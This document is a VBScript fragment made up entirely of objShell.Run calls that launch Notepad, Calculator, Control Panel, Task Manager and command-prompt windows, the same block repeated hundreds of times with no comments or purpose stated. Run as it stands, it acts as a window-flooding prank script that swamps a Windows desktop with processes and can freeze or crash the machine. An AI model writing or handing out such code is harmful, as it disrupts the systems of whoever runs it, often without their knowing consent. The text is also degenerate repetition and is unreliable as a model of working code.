objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
